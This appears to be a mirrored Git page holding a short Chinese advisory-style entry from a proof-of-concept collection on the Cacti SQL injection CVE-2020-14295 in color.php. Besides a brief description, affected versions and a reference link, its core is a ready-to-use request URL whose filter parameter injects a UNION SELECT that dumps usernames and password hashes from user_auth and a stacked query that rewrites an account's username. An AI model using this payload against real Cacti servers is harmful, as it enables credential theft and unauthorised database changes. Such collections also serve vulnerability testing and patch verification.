admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-06 19:38:09 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/Web应用漏洞/Cacti SQL 注入漏洞 CVE-2020-14295.md
Threekiii 11de4c1d47 update
2024-11-06 14:10:36 +08:00

25 lines
622 B
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Cacti SQL 注入漏洞 CVE-2020-14295
## 漏洞描述
Cacti 1.2.12 中 color.php 中存在 SQL注入漏洞允许具有管理员权限的攻击者通过 filter 参数注入 SQL。因为产品接受堆积的查询所以这可能导致远程命令执行。目前该漏洞 EXP 已公开。
参考链接:
- https://github.com/Cacti/cacti/issues/3622
## 漏洞影响
```
Cacti < 1.2.13
```
## 漏洞复现
poc
```
/cacti/color.php?action=export&header=false&filter=')+UNION+SELECT+1,username,password,4,5,6,7+from+user_auth;update+user_auth+set+username='sqli'+where+id=3;--+-
```
Reference in New Issue View Git Blame Copy Permalink